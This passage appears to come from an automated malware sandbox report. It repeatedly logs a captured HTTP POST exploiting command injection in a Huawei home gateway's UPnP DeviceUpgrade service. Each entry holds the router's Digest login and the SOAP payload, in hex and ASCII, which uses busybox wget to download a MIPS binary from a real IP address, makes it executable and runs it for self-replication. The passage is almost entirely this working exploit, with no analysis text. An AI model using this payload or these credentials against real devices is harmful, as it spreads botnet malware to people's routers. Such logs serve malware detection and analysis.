s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 